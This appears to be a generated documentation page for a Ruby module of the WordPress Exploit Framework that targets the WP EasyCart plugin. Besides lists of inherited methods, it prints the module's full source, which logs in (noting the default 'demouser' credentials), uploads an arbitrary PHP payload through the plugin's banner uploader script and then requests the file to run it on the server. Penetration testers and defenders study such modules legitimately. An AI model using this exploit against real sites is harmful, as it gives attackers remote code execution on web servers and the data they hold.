Class: Wpxf::Exploit::EasyCartShellUpload
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login
- Defined in:
- lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #ec_password ⇒ Object
- #ec_password_is_hash ⇒ Object
-
#initialize ⇒ EasyCartShellUpload
constructor
A new instance of EasyCartShellUpload.
- #password ⇒ Object
- #payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object
- #plugin_url ⇒ Object
- #req_id ⇒ Object
- #run ⇒ Object
- #uploader_url ⇒ Object
- #use_ec_authentication ⇒ Object
- #use_wordpress_authentication ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ EasyCartShellUpload
Returns a new instance of EasyCartShellUpload.
8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 8 def initialize super update_info( name: 'EasyCart Shell Upload', desc: 'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\ 'contains a flaw that allows a remote attacker to execute '\ 'arbitrary PHP code. This flaw exists because the '\ '/inc/amfphp/administration/banneruploaderscript.php script does '\ 'not properly verify or sanitize user-uploaded files. By '\ 'uploading a .php file, the remote system will place the file in '\ 'a user-accessible path. Making a direct request to the uploaded '\ 'file will allow the attacker to execute the script with the '\ 'privileges of the web server.'\ "\n"\ 'In versions <= 3.0.8 authentication can be done by using the '\ 'WordPress credentials of a user with any role. In later '\ 'versions, a valid EasyCart admin password will be required that '\ 'is in use by any admin user. A default installation of EasyCart '\ 'will setup a user called "demouser" with a preset password '\ 'of "demouser".', author: [ 'Kacper Szurek', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7745'] ], date: 'Jan 08 2015' ) ([ StringOption.new( name: 'username', desc: 'The WordPress username to authenticate with (versions <= 3.0.8)' ), StringOption.new( name: 'password', desc: 'The WordPress password to authenticate with (versions <= 3.0.8)' ), StringOption.new( name: 'ec_password', desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)' ), BooleanOption.new( name: 'ec_password_is_hash', desc: 'Whether or not ec_password is an MD5 hash', default: false ) ]) end |
Instance Method Details
#check ⇒ Object
92 93 94 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 92 def check check_plugin_version_from_readme('wp-easycart', '3.0.19') end |
#ec_password ⇒ Object
68 69 70 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 68 def ec_password normalized_option_value('ec_password') end |
#ec_password_is_hash ⇒ Object
72 73 74 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 72 def ec_password_is_hash normalized_option_value('ec_password_is_hash') end |
#password ⇒ Object
64 65 66 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 64 def password normalized_option_value('password') end |
#payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object
104 105 106 107 108 109 110 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 104 def payload_body_builder(date_hash, payload_name, include_req_id) builder = Utility::BodyBuilder.new builder.add_field('datemd5', date_hash) builder.add_file_from_string('Filedata', payload.encoded, payload_name) builder.add_field('reqID', req_id) if include_req_id builder end |
#plugin_url ⇒ Object
96 97 98 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 96 def plugin_url normalize_uri(wordpress_url_plugins, 'wp-easycart') end |
#req_id ⇒ Object
84 85 86 87 88 89 90 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 84 def req_id if ec_password_is_hash return ec_password else return Utility::Text.md5(ec_password) end end |
#run ⇒ Object
112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 112 def run return false unless super if !use_wordpress_authentication && !use_ec_authentication emit_error 'You must set either the username and password options or '\ 'specify an ec_password value' return false end if use_wordpress_authentication && use_ec_authentication emit_info 'Both EasyCart and WordPress credentials were supplied, '\ 'attempting WordPress first...' end if use_wordpress_authentication emit_info "Authenticating using #{username}:#{password}..." = wordpress_login(username, password) if ! if use_ec_authentication emit_warning 'Failed to authenticate with WordPress, attempting '\ 'upload with EC password next...' else emit_error 'Failed to authenticate with WordPress' return false end else emit_success 'Authenticated with WordPress', true end end emit_info 'Preparing payload...' payload_name = Utility::Text.rand_alpha(10) date_hash = Utility::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) builder = payload_body_builder( date_hash, "#{payload_name}.php", use_ec_authentication ) emit_info 'Uploading payload...' res = nil builder.create do |body| res = execute_post_request(url: uploader_url, body: body, cookie: ) end if res.nil? || res.code != 200 emit_error 'Failed to upload payload' emit_error "Server responded with code #{res.code}", true return false end emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end true end |
#uploader_url ⇒ Object
100 101 102 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 100 def uploader_url normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') end |
#use_ec_authentication ⇒ Object
80 81 82 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 80 def use_ec_authentication ec_password.to_s != '' end |
#use_wordpress_authentication ⇒ Object
76 77 78 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 76 def use_wordpress_authentication username.to_s != '' && password.to_s != '' end |
#username ⇒ Object
60 61 62 |
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 60 def username normalized_option_value('username') end |